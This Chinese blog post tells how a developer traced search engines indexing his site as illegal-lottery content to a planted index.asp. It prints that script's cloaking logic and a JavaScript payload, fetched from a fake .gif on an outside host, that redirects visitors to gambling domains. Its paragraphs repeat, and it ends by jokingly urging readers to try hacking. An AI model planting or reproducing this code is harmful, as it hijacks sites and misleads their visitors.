之前网站上有一个专题总是被百度收录成非法彩票信息,打开网页看正常,页面源代码也查找不到非法彩票的相关字眼,甚是奇怪,未果。今日领导又提及此事,便不知如何是好,只能硬着头皮彻头彻尾的仔细寻找,更新cdn,杀毒软件扫描也正常,正在绝望之际,发现目录下多了个脚本文件index.asp。暗喜,原来罪魁祸首在此。把它rename,在用搜索抓取模拟器测试,正常。
下面兴趣之余,打开文件来研究。
因为本人是写java的,asp不太熟,而且只用过c#写asp,看上去又不像vb,不过从第一行就看得出它想做什么了。 allow_agent=split("Baiduspider,Googlebot",","),显然,是对搜索引擎做处理,不用猜也知道,他下面的脚本应该是要欺骗搜索引擎了。欺骗搜索引擎,他应该要转向一个他自己的病毒页面,应该有url地址才对,但是脚本竟然没有url地址出现过,迷茫。
但是,有个极为可以的地方,<script language="javascript" src="http://bde300.cn/images/gov.gif"></script>这个标签要加载一个js脚本,但是地址竟然是个gif图片?神奇。习惯上会把这个地址复制到浏览器上看看是啥玩意儿。失望,是一个红叉。
以正常思路这个图片是不存在,但是谁又知道该地址背后隐藏的秘密?打开下载工具,把图片地址复制上去,保存为txt文件。不看不知道,一看吓一跳,打开文件竟然是熟悉的javascript脚本。如果不处处怀疑,做梦也不会想到这个不存在的图片就是关键所在。牛B。
代码如下:
上面有两个url地址:ht tp://www.58887888.net./,ht tp://www.58887888.net./index2.htm,就是带非法彩票信息的页面了。不去研究又怎知道,原来我们看到的一个很正常的网页,在搜索引擎眼里竟然是一个非法彩票网页。欧麦嘎,这就是黑客,只要利用服务器的漏洞写入一个不到1kg的脚本文件,不仅把大家的肉眼欺骗了,连度娘和谷哥也蒙在鼓里,哈哈,是不是心动想做黑客了吧,心动不如行动。。。
下面兴趣之余,打开文件来研究。
<%
Function check(user_agent)
allow_agent=split("Baiduspider,Googlebot",",")
check_agent=false
For agents=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agents))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function
canshu=Request.ServerVariables("query_string")
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
Refer=Request.ServerVariables("HTTP_REFERER")
If check(user_agent)=true then
%>
<!--#include file="../a_images/pic.jpg"-->
<%else%>
<%
Refer=Request.ServerVariables("HTTP_REFERER")
if Instr(Refer,"wd=%C1%F9%BA%CF%B2%CA")<>0 or Instr(Refer,"wd=%E5%85%AD%E5%90%88%E5%BD%A9")<>0 Then%>
<script language="javascript" src="http://bde300.cn/images/gov.gif"></script>
<%
response.end
end if%>
<!--#include file="index.shtml"-->
<%end if%>
因为本人是写java的,asp不太熟,而且只用过c#写asp,看上去又不像vb,不过从第一行就看得出它想做什么了。 allow_agent=split("Baiduspider,Googlebot",","),显然,是对搜索引擎做处理,不用猜也知道,他下面的脚本应该是要欺骗搜索引擎了。欺骗搜索引擎,他应该要转向一个他自己的病毒页面,应该有url地址才对,但是脚本竟然没有url地址出现过,迷茫。
但是,有个极为可以的地方,<script language="javascript" src="http://bde300.cn/images/gov.gif"></script>这个标签要加载一个js脚本,但是地址竟然是个gif图片?神奇。习惯上会把这个地址复制到浏览器上看看是啥玩意儿。失望,是一个红叉。
以正常思路这个图片是不存在,但是谁又知道该地址背后隐藏的秘密?打开下载工具,把图片地址复制上去,保存为txt文件。不看不知道,一看吓一跳,打开文件竟然是熟悉的javascript脚本。如果不处处怀疑,做梦也不会想到这个不存在的图片就是关键所在。牛B。
代码如下:
GIF89a="";
var d=document.referrer;
if ((d.indexOf("wd=%C1%F9%BA%CF%B2%CA")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA")>0)){
if((window.location.href.indexOf("baotou")>0)||(window.location.href.indexOf("cnhubei")>0)){
window.location.href="http://www.58887888.net./";
}
else{
window.location.href="http://www.58887888.net./index2.htm";
}
}
上面有两个url地址:ht tp://www.58887888.net./,ht tp://www.58887888.net./index2.htm,就是带非法彩票信息的页面了。不去研究又怎知道,原来我们看到的一个很正常的网页,在搜索引擎眼里竟然是一个非法彩票网页。欧麦嘎,这就是黑客,只要利用服务器的漏洞写入一个不到1kg的脚本文件,不仅把大家的肉眼欺骗了,连度娘和谷哥也蒙在鼓里,哈哈,是不是心动想做黑客了吧,心动不如行动。。。
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
